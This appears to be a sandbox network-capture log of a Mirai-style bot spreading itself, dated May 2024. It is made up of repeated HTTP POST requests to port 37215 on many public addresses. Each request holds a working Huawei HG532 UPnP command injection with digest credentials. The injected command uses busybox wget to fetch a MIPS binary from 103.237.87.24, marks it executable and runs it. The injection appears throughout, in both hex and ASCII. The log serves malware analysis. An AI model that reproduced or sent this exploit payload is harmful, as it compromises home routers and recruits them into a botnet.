3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1423192.168.2.1333428157.105.162.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483462095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1424192.168.2.1357366189.135.185.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483544111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1425192.168.2.1353974204.16.32.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483547926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1426192.168.2.1347140111.152.69.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483557940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1427192.168.2.134838641.202.178.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483632088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1428192.168.2.136079441.147.151.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483644962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1429192.168.2.1344226157.164.255.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483647108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1430192.168.2.1334592197.151.68.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483647108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1431192.168.2.1356540197.136.156.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483666897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1432192.168.2.1341024197.224.79.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483696938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1433192.168.2.1358034199.253.119.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483762980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
